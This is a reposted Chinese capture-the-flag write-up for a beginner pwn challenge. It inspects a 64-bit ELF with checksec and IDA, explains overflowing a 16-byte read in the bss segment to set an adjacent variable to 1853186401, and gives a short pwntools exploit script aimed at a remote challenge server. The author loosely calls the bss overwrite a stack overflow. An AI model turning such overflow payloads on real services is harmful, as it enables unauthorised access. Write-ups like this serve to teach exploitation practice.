题目网址:
攻防世界
下载文件,文件名太长了把文件改名为pwn
把pwn文件放入kali里面
file一下查看文件类型
发现是一个64位的elf文件,加个运行权限,运行一下看看
使用 checksec 检查保护
发现只开了 NX 保护。
把pwn放入64位IDA中,F5反汇编一下main函数
得到main函数伪代码
__int64 __fastcall main(int a1, char **a2, char **a3)
{
alarm(0x3Cu);
setbuf(stdout, 0LL);
puts("~~ welcome to ctf ~~ ");
puts("lets get helloworld for bof");
read(0, &unk_601068, 0x10uLL);
if ( dword_60106C == 1853186401 )
sub_400686();
return 0LL;
}
点击 read(0, &unk_601068, 0x10uLL);处的unk_601068
发现这个要我们输入的变量在bss段处
bss段:通常是指用来存放程序中未初始化的全局变量和静态变量的一块内存区域。
关键语句是这个
if ( dword_60106C == 1853186401 )
sub_400686();
点击sub_400686();发现这个是获取flag的函数
所以说题目就是想要当dword_60106C等于1853186401时,给我们flag
但是让我们输入的的变量名为unk_601068,我们正常输入是不能使dword_60106C等于1853186401的,我们要通过栈溢出,使dword_60106C等于1853186401。
我们从IDA中可以看出dword_60106C在unk_601068的下面,在计算机内存中变量应该是从下往上排列的,但是IDA为了符合我们喜欢向下看的习惯,把变量从上往下排了。我们只需要在输入unk_601068时,输入无关的数据,使得栈的指针指向60106C处,然后在此处输入1853186401。即可完成题目要求
pwnpayload.:
from pwn import *
context(os='linux', arch="amd64", log_level="debug")
os = remote('61.147.171.105',61286)#填写远程连接的ip和端口
os.recvuntil('lets get helloworld for bof\n')#这里是运行程序将要接收到的文字
payload = b'a'*(0x6c-0x68) + p64(1853186401) #a是垃圾信息 p64指的是以64位打包
os.sendline(payload)
os.interactive()
标签:
安全
本文转载自: https://blog.csdn.net/m0_62584974/article/details/127970398
版权归原作者 墨言ink 所有, 如有侵权,请联系我们删除。
版权归原作者 墨言ink 所有, 如有侵权,请联系我们删除。